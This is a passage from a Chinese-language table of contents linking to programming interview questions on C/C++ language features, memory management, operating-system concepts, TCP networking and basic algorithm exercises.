构造函数和析构函数可以为虚函数吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#659%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97) ##### [17.3.7 栈和堆的区别,什么时候必须使用堆](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#660%E6%A0%88%E5%92%8C%E5%A0%86%E7%9A%84%E5%8C%BA%E5%88%AB%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%BF%85%E9%A1%BB%E4%BD%BF%E7%94%A8%E5%A0%86) ##### [17.3.8 用宏定义实现swap](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#661%E7%94%A8%E5%AE%8F%E5%AE%9A%E4%B9%89%E5%AE%9E%E7%8E%B0swap) ##### [17.3.9 头文件<>和""的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#662%E5%A4%B4%E6%96%87%E4%BB%B6%E5%92%8C%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.4.1 编写string的构造函数、拷贝构造函数、赋值操作符重载和析构函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#663%E7%BC%96%E5%86%99string%E7%9A%84%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%B5%8B%E5%80%BC%E6%93%8D%E4%BD%9C%E7%AC%A6%E9%87%8D%E8%BD%BD%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0) ##### [17.4.2 进程和线程间的通信方式](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#664%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B%E9%97%B4%E7%9A%84%E9%80%9A%E4%BF%A1%E6%96%B9%E5%BC%8F) ##### [17.4.3 死锁产生的原因和死锁的条件](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#665%E6%AD%BB%E9%94%81%E4%BA%A7%E7%94%9F%E7%9A%84%E5%8E%9F%E5%9B%A0%E5%92%8C%E6%AD%BB%E9%94%81%E7%9A%84%E6%9D%A1%E4%BB%B6) ##### [17.4.4 如何采用单线程处理高并发](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#666%E5%A6%82%E4%BD%95%E9%87%87%E7%94%A8%E5%8D%95%E7%BA%BF%E7%A8%8B%E5%A4%84%E7%90%86%E9%AB%98%E5%B9%B6%E5%8F%91) ##### [17.4.5 线程的状态](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#667%E7%BA%BF%E7%A8%8B%E7%9A%84%E7%8A%B6%E6%80%81) ##### [17.4.6 进程的状态](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#668%E8%BF%9B%E7%A8%8B%E7%9A%84%E7%8A%B6%E6%80%81) ##### [17.4.7 系统调用brk和mmap](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#669%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8brk%E5%92%8Cmmap) ##### [17.4.8 说说三种内存管理机制](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#670%E8%AF%B4%E8%AF%B4%E4%B8%89%E7%A7%8D%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%9C%BA%E5%88%B6) ##### [17.4.9 大端和小端,用C++代码怎么确定](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#671%E5%A4%A7%E7%AB%AF%E5%92%8C%E5%B0%8F%E7%AB%AF%E7%94%A8c%E4%BB%A3%E7%A0%81%E6%80%8E%E4%B9%88%E7%A1%AE%E5%AE%9A) ##### [17.5.1 TCP和UDP的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#672tcp%E5%92%8Cudp%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.5.2 TCP三次握手](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#673tcp%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B) ##### [17.5.3 三次握手的原因](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#674%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B%E7%9A%84%E5%8E%9F%E5%9B%A0) ##### [17.5.4 TCP四次挥手](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#675tcp%E5%9B%9B%E6%AC%A1%E6%8C%A5%E6%89%8B) ##### [17.5.5 
四次挥手的原因](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#676%E5%9B%9B%E6%AC%A1%E6%8C%A5%E6%89%8B%E7%9A%84%E5%8E%9F%E5%9B%A0) ##### [17.5.6 TIME_WAIT](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#677time_wait) ##### [17.5.7 Http协议](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#678http%E5%8D%8F%E8%AE%AE) ##### [17.5.8 几种常见的排序算法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#679%E5%87%A0%E7%A7%8D%E5%B8%B8%E8%A7%81%E7%9A%84%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95) ##### [17.5.9 链表的一些性质和操作](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#680%E9%93%BE%E8%A1%A8%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%A7%E8%B4%A8%E5%92%8C%E6%93%8D%E4%BD%9C) ##### [17.6.1 常见的查找算法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#681%E5%B8%B8%E8%A7%81%E7%9A%84%E6%9F%A5%E6%89%BE%E7%AE%97%E6%B3%95) ##### [17.6.2 动态规划](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#682%E5%8A%A8%E6%80%81%E8%A7%84%E5%88%92) ##### [17.6.3 关键字 static 的作用是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#683%E5%85%B3%E9%94%AE%E5%AD%97-static-%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.6.4 “引用”与指针的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#684%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.6.5 ..h 头文件中的 ifndef/define/endif 的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#685h-%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84-ifndefdefineendif-%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [17.6.6 #include 与 #include “file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#686include-%E4%B8%8E-include-fileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.6.7 描述实时系统的基本特性](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#687%E6%8F%8F%E8%BF%B0%E5%AE%9E%E6%97%B6%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%9F%BA%E6%9C%AC%E7%89%B9%E6%80%A7) ##### [17.6.8 全局变量和局部变量在内存中是否有区别?如果有,是什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#688%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E6%98%AF%E5%90%A6%E6%9C%89%E5%8C%BA%E5%88%AB%E5%A6%82%E6%9E%9C%E6%9C%89%E6%98%AF%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [17.6.9 什么是平衡二叉树?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#689%E4%BB%80%E4%B9%88%E6%98%AF%E5%B9%B3%E8%A1%A1%E4%BA%8C%E5%8F%89%E6%A0%91) ##### [17.7.1 堆栈溢出一般是由什么原因导致的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#690%E5%A0%86%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%80%E8%88%AC%E6%98%AF%E7%94%B1%E4%BB%80%E4%B9%88%E5%8E%9F%E5%9B%A0%E5%AF%BC%E8%87%B4%E7%9A%84) ##### [17.7.2 冒泡排序算法的时间复杂度是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#691%E5%86%92%E6%B3%A1%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95%E7%9A%84%E6%97%B6%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.7.3 什么函数不能声明为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#692%E4%BB%80%E4%B9%88%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E5%A3%B0%E6%98%8E%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [17.7.4 
队列和栈有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#693%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB)
##### [17.7.5 不能做 switch()的参数类型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#694%E4%B8%8D%E8%83%BD%E5%81%9A-switch%E7%9A%84%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B)
##### [17.7.6 局部变量能否和全局变量重名?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#695%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E8%83%BD%E5%90%A6%E5%92%8C%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E9%87%8D%E5%90%8D)
##### [17.7.7 如何引用一个已经定义过的全局变量?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#696%E5%A6%82%E4%BD%95%E5%BC%95%E7%94%A8%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%AE%9A%E4%B9%89%E8%BF%87%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F)
##### [17.7.8 全局变量可不可以定义在可被多个.C 文件包含的头文件中?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#697%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%8F%AF%E4%B8%8D%E5%8F%AF%E4%BB%A5%E5%AE%9A%E4%B9%89%E5%9C%A8%E5%8F%AF%E8%A2%AB%E5%A4%9A%E4%B8%AAc-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E4%B8%BA%E4%BB%80%E4%B9%88)
##### [17.7.9 语句 for( ;1 ;)有什么问题?它是什么意思?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#698%E8%AF%AD%E5%8F%A5-for-1-%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%E5%AE%83%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D)
##### [17.8.1 do……while 和 while……do 有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#699dowhile-%E5%92%8C-whiledo-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB)
##### [17.8.2 static 全局变量、局部变量、函数与普通全局变量、局部变量、函数 static 全局变量与普通的全局变量有什么区别?static局部变量和普通局部变量有什么区别? 
static 函数与普通函数有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#700statac-%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%87%BD%E6%95%B0-static-%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E4%B8%8E%E6%99%AE%E9%80%9A%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%ABstatic%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%92%8C%E6%99%AE%E9%80%9A%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB-static-%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [17.8.3 程序的内存分配](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#701%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D) ##### [17.8.4 解释堆和栈的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#702%E8%A7%A3%E9%87%8A%E5%A0%86%E5%92%8C%E6%A0%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.8.5 什么是预编译,何时需要预编译?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#703%E4%BB%80%E4%B9%88%E6%98%AF%E9%A2%84%E7%BC%96%E8%AF%91%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E9%A2%84%E7%BC%96%E8%AF%91) ##### [17.8.6 关键字 const 是什么含意?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#704%E5%85%B3%E9%94%AE%E5%AD%97-const-%E6%98%AF%E4%BB%80%E4%B9%88%E5%90%AB%E6%84%8F) ##### [17.8.7 关键字 volatile 有什么含意 并给出三个不同的例子。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#705%E5%85%B3%E9%94%AE%E5%AD%97-volatile-%E6%9C%89%E4%BB%80%E4%B9%88%E5%90%AB%E6%84%8F-%E5%B9%B6%E7%BB%99%E5%87%BA%E4%B8%89%E4%B8%AA%E4%B8%8D%E5%90%8C%E7%9A%84%E4%BE%8B%E5%AD%90) ##### [17.8.8 三种基本的数据模型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#706%E4%B8%89%E7%A7%8D%E5%9F%BA%E6%9C%AC%E7%9A%84%E6%95%B0%E6%8D%AE%E6%A8%A1%E5%9E%8B) ##### [17.8.9 结构与联合有和区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#707%E7%BB%93%E6%9E%84%E4%B8%8E%E8%81%94%E5%90%88%E6%9C%89%E5%92%8C%E5%8C%BA%E5%88%AB) ##### [17.9.1 描述内存分配方式以及它们的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#708%E6%8F%8F%E8%BF%B0%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%96%B9%E5%BC%8F%E4%BB%A5%E5%8F%8A%E5%AE%83%E4%BB%AC%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.9.2 请说出 const 与#define 相比,有何优点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#709%E8%AF%B7%E8%AF%B4%E5%87%BA-const-%E4%B8%8Edefine-%E7%9B%B8%E6%AF%94%E6%9C%89%E4%BD%95%E4%BC%98%E7%82%B9) ##### [17.9.3 简述数组与指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#710%E7%AE%80%E8%BF%B0%E6%95%B0%E7%BB%84%E4%B8%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.9.4 分别写出 BOOL,int,float,指针类型的变量 a 与“零”的比较语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#711%E5%88%86%E5%88%AB%E5%86%99%E5%87%BA-boolintfloat%E6%8C%87%E9%92%88%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%98%E9%87%8F-a-%E4%B8%8E%E9%9B%B6%E7%9A%84%E6%AF%94%E8%BE%83%E8%AF%AD%E5%8F%A5) ##### [17.9.5 如何判断一段程序是由 C 编译程序还是由 
C++编译程序编译的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#712%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E4%B8%80%E6%AE%B5%E7%A8%8B%E5%BA%8F%E6%98%AF%E7%94%B1-c-%E7%BC%96%E8%AF%91%E7%A8%8B%E5%BA%8F%E8%BF%98%E6%98%AF%E7%94%B1-c%E7%BC%96%E8%AF%91%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84) ##### [17.9.6 用两个栈实现一个队列的功能?要求给出算法和思路!](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#713%E7%94%A8%E4%B8%A4%E4%B8%AA%E6%A0%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%98%9F%E5%88%97%E7%9A%84%E5%8A%9F%E8%83%BD%E8%A6%81%E6%B1%82%E7%BB%99%E5%87%BA%E7%AE%97%E6%B3%95%E5%92%8C%E6%80%9D%E8%B7%AF) ##### [17.9.7 嵌入式系统中经常要用到无限循环,你怎么样用 C 编写死循环呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#714%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E4%B8%AD%E7%BB%8F%E5%B8%B8%E8%A6%81%E7%94%A8%E5%88%B0%E6%97%A0%E9%99%90%E5%BE%AA%E7%8E%AF%E4%BD%A0%E6%80%8E%E4%B9%88%E6%A0%B7%E7%94%A8-c-%E7%BC%96%E5%86%99%E6%AD%BB%E5%BE%AA%E7%8E%AF%E5%91%A2) ##### [17.9.8 位操作(Bit manipulation)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#715%E4%BD%8D%E6%93%8D%E4%BD%9Cbit-manipulation) ##### [17.9.9 访问固定的内存位置(Accessing fixed memory locations)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#716%E8%AE%BF%E9%97%AE%E5%9B%BA%E5%AE%9A%E7%9A%84%E5%86%85%E5%AD%98%E4%BD%8D%E7%BD%AEaccessing-fixed-memory-locations) ##### [18.1.1 中断(Interrupts)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#717%E4%B8%AD%E6%96%ADinterrupts) ##### [18.1.2 动态内存分配(Dynamic memory allocation)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#718%E5%8A%A8%E6%80%81%E5%86%85%E5%AD%98%E5%88%86%E9%85%8Ddynamic-memory-allocation) ##### [18.1.3 Typedef](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#719typedef) ##### [18.1.4 用变量 a 给出下面的定义](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#720%E7%94%A8%E5%8F%98%E9%87%8F-a-%E7%BB%99%E5%87%BA%E4%B8%8B%E9%9D%A2%E7%9A%84%E5%AE%9A%E4%B9%89) ##### [18.1.5 写一个“标准”宏](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#721%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8F) ##### [18.1.6 A.c 和 B.c 两个 c 文件中使用了两个相同名字的 static 变量,编译的时候会不会有问题? 
这两个 static 变量会保存到哪里(栈还是堆或者其他的)?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#722ac-%E5%92%8C-bc-%E4%B8%A4%E4%B8%AA-c-%E6%96%87%E4%BB%B6%E4%B8%AD%E4%BD%BF%E7%94%A8%E4%BA%86%E4%B8%A4%E4%B8%AA%E7%9B%B8%E5%90%8C%E5%90%8D%E5%AD%97%E7%9A%84-static-%E5%8F%98%E9%87%8F%E7%BC%96%E8%AF%91%E7%9A%84%E6%97%B6%E5%80%99%E4%BC%9A%E4%B8%8D%E4%BC%9A%E6%9C%89%E9%97%AE%E9%A2%98-%E8%BF%99%E4%B8%A4%E4%B8%AA-static-%E5%8F%98%E9%87%8F%E4%BC%9A%E4%BF%9D%E5%AD%98%E5%88%B0%E5%93%AA%E9%87%8C%E6%A0%88%E8%BF%98%E6%98%AF%E5%A0%86%E6%88%96%E8%80%85%E5%85%B6%E4%BB%96%E7%9A%84) ##### [18.1.7 一个单向链表,不知道头节点,一个指针指向其中的一个节点,问如何删除这个指针指 向的节点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#723%E4%B8%80%E4%B8%AA%E5%8D%95%E5%90%91%E9%93%BE%E8%A1%A8%E4%B8%8D%E7%9F%A5%E9%81%93%E5%A4%B4%E8%8A%82%E7%82%B9%E4%B8%80%E4%B8%AA%E6%8C%87%E9%92%88%E6%8C%87%E5%90%91%E5%85%B6%E4%B8%AD%E7%9A%84%E4%B8%80%E4%B8%AA%E8%8A%82%E7%82%B9%E9%97%AE%E5%A6%82%E4%BD%95%E5%88%A0%E9%99%A4%E8%BF%99%E4%B8%AA%E6%8C%87%E9%92%88%E6%8C%87-%E5%90%91%E7%9A%84%E8%8A%82%E7%82%B9) ##### [18.1.8 比较字符串,输出它们第一个不同字母的位置,大小写不敏感](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#724%E6%AF%94%E8%BE%83%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BE%93%E5%87%BA%E5%AE%83%E4%BB%AC%E7%AC%AC%E4%B8%80%E4%B8%AA%E4%B8%8D%E5%90%8C%E5%AD%97%E6%AF%8D%E7%9A%84%E4%BD%8D%E7%BD%AE%E5%A4%A7%E5%B0%8F%E5%86%99%E4%B8%8D%E6%95%8F%E6%84%9F) ##### [18.1.9 判断一个数是不是回文数,数字 1234321。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#725%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%AA%E6%95%B0%E6%98%AF%E4%B8%8D%E6%98%AF%E5%9B%9E%E6%96%87%E6%95%B0%E6%95%B0%E5%AD%97-1234321) ##### [18.2.1 比较两字符串长短,并返回结果。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#726%E6%AF%94%E8%BE%83%E4%B8%A4%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%95%BF%E7%9F%AD%E5%B9%B6%E8%BF%94%E5%9B%9E%E7%BB%93%E6%9E%9C) ##### [18.2.2 给一个字符串,编程取其中一个特定的字符并输出。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#727%E7%BB%99%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%BC%96%E7%A8%8B%E5%8F%96%E5%85%B6%E4%B8%AD%E4%B8%80%E4%B8%AA%E7%89%B9%E5%AE%9A%E7%9A%84%E5%AD%97%E7%AC%A6%E5%B9%B6%E8%BE%93%E5%87%BA) ##### [18.2.3 是比较两个英文字符串的不相同的字符的位置(忽略字母大小写)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#728%E6%98%AF%E6%AF%94%E8%BE%83%E4%B8%A4%E4%B8%AA%E8%8B%B1%E6%96%87%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9A%84%E4%B8%8D%E7%9B%B8%E5%90%8C%E7%9A%84%E5%AD%97%E7%AC%A6%E7%9A%84%E4%BD%8D%E7%BD%AE%E5%BF%BD%E7%95%A5%E5%AD%97%E6%AF%8D%E5%A4%A7%E5%B0%8F%E5%86%99) ##### [18.2.4 主函数调用一函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#729%E4%B8%BB%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E4%B8%80%E5%87%BD%E6%95%B0) ##### [18.2.5 输入一个整数n,计算不大于n的数中和7相关的数的个数,包括能被7整出的数和含有字符7的数。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#730%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0n%E8%AE%A1%E7%AE%97%E4%B8%8D%E5%A4%A7%E4%BA%8En%E7%9A%84%E6%95%B0%E4%B8%AD%E5%92%8C7%E7%9B%B8%E5%85%B3%E7%9A%84%E6%95%B0%E7%9A%84%E4%B8%AA%E6%95%B0%E5%8C%85%E6%8B%AC%E8%83%BD%E8%A2%AB7%E6%95%B4%E5%87%BA%E7%9A%84%E6%95%B0%E5%92%8C%E5%90%AB%E6%9C%89%E5%AD%97%E7%AC%A67%E7%9A%84%E6%95%B0) ##### [18.2.6 
输入一个整数将每一位上的奇数放在一个新整数中,高位放在高位,地位在低位。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#731%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%AA%E6%95%B4%E6%95%B0%E5%B0%86%E6%AF%8F%E4%B8%80%E4%BD%8D%E4%B8%8A%E7%9A%84%E5%A5%87%E6%95%B0%E6%94%BE%E5%9C%A8%E4%B8%80%E4%B8%AA%E6%96%B0%E6%95%B4%E6%95%B0%E4%B8%AD%E9%AB%98%E4%BD%8D%E6%94%BE%E5%9C%A8%E9%AB%98%E4%BD%8D%E5%9C%B0%E4%BD%8D%E5%9C%A8%E4%BD%8E%E4%BD%8D) ##### [18.2.7 输入一串数,将其最小的放在第一位,次小的放在最后一位,再小的放在第二位,再再小的放在倒数第二位,以此类推。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#732%E8%BE%93%E5%85%A5%E4%B8%80%E4%B8%B2%E6%95%B0%E5%B0%86%E5%85%B6%E6%9C%80%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E7%AC%AC%E4%B8%80%E4%BD%8D%E6%AC%A1%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E6%9C%80%E5%90%8E%E4%B8%80%E4%BD%8D%E5%86%8D%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E7%AC%AC%E4%BA%8C%E4%BD%8D%E5%86%8D%E5%86%8D%E5%B0%8F%E7%9A%84%E6%94%BE%E5%9C%A8%E5%80%92%E6%95%B0%E7%AC%AC%E4%BA%8C%E4%BD%8D%E4%BB%A5%E6%AD%A4%E7%B1%BB%E6%8E%A8) ##### [18.2.8 写一个函数,传入参数为应付钱数。返回值为买家最少付出的钱的张数int get MoneyNum(int iInputMoney)例如:买家应付351元,最少张数为5.备注:可支付的钱币只有100、50、10、5、1不考虑2、20以及小数部分。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#733%E5%86%99%E4%B8%80%E4%B8%AA%E5%87%BD%E6%95%B0%E4%BC%A0%E5%85%A5%E5%8F%82%E6%95%B0%E4%B8%BA%E5%BA%94%E4%BB%98%E9%92%B1%E6%95%B0%E8%BF%94%E5%9B%9E%E5%80%BC%E4%B8%BA%E4%B9%B0%E5%AE%B6%E6%9C%80%E5%B0%91%E4%BB%98%E5%87%BA%E7%9A%84%E9%92%B1%E7%9A%84%E5%BC%A0%E6%95%B0int-get-moneynumint-iinputmoney%E4%BE%8B%E5%A6%82%E4%B9%B0%E5%AE%B6%E5%BA%94%E4%BB%98351%E5%85%83%E6%9C%80%E5%B0%91%E5%BC%A0%E6%95%B0%E4%B8%BA5%E5%A4%87%E6%B3%A8%E5%8F%AF%E6%94%AF%E4%BB%98%E7%9A%84%E9%92%B1%E5%B8%81%E5%8F%AA%E6%9C%89100501051%E4%B8%8D%E8%80%83%E8%99%91220%E4%BB%A5%E5%8F%8A%E5%B0%8F%E6%95%B0%E9%83%A8%E5%88%86) ##### [18.2.9 对姓氏进行排名](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#734%E5%AF%B9%E5%A7%93%E6%B0%8F%E8%BF%9B%E8%A1%8C%E6%8E%92%E5%90%8D) ##### [18.3.1 将一组整数中为奇数的数提取出来,高低位顺序不变。如:8 3 7 9 5 2 1 4-----》3 7 5 1](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#735%E5%B0%86%E4%B8%80%E7%BB%84%E6%95%B4%E6%95%B0%E4%B8%AD%E4%B8%BA%E5%A5%87%E6%95%B0%E7%9A%84%E6%95%B0%E6%8F%90%E5%8F%96%E5%87%BA%E6%9D%A5%E9%AB%98%E4%BD%8E%E4%BD%8D%E9%A1%BA%E5%BA%8F%E4%B8%8D%E5%8F%98%E5%A6%828-3-7-9-5-2-1-4-----3-7-5-1) ##### [18.3.2 一组2n+1个元素的正整形数组,按升序排序,然后将小于中间数值的成员替换为中间的值。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#736%E4%B8%80%E7%BB%842n1%E4%B8%AA%E5%85%83%E7%B4%A0%E7%9A%84%E6%AD%A3%E6%95%B4%E5%BD%A2%E6%95%B0%E7%BB%84%E6%8C%89%E5%8D%87%E5%BA%8F%E6%8E%92%E5%BA%8F%E7%84%B6%E5%90%8E%E5%B0%86%E5%B0%8F%E4%BA%8E%E4%B8%AD%E9%97%B4%E6%95%B0%E5%80%BC%E7%9A%84%E6%88%90%E5%91%98%E6%9B%BF%E6%8D%A2%E4%B8%BA%E4%B8%AD%E9%97%B4%E7%9A%84%E5%80%BC) ##### [18.3.3 